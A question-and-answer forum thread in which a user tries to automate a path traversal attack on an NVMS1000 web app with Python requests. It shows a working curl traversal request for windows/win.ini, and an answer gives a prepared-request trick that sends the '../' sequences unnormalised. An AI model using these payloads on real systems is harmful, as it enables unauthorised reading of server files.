Julian12
Reputation: 21
Path traversal with python request
recently I wanted to automate an attack for a web app that is prone to path traversal attacks (NVMS1000) via python requests module.
The request works perfectly with curl by using the option path-as-is:
curl --path-as-is http://127.0.0.1/../../../../../../../../../../windows/win.ini
However when using python requests module the "../" where stripped from the urlpath (as I can clearly see e.g. via Burp Suite):
host = "127.0.0.1"
path = "/../../../../../../../../../.."
file = "/windows/win.ini"
url = host+path+file
response = requests.get(url,proxies=proxies)
I checked the docs but did not find any explanation for this behaviour nor found an option to prevent the stripping/normalization similar as the option for curl.
platform is debian, request module is version 2.22.0
Thanks for your help.
Upvotes: 2
Views: 3468
Answers (1)
oxynoia
Reputation: 61
I know I am late, but consider downgrading urllib3:
pip install --upgrade urllib3==1.24.3
Or better yet, you should use prepared requests:
my_url = 'http://127.0.0.1/../../../../../../../../../../windows/win.ini'
s = requests.Session()
r = requests.Request(method='GET', url=my_url)
prep = r.prepare()
prep.url = my_url # actual url you want
response = s.send(prep)
Upvotes: 1
Related Questions
- How to send GET Request with path parameters in Python
- Can't find path when requesting from API endpoint
- Traverse directory at URL to root in Python
- python requests library: Function to get response from appended path
- python requests @ params
- python requests and percent encoding of path
- Iterate URL's with Python Requests
- urllib2/requests and HTTP relative path
- Python HTTP Request URL End Slash
- Python Routes, giving request method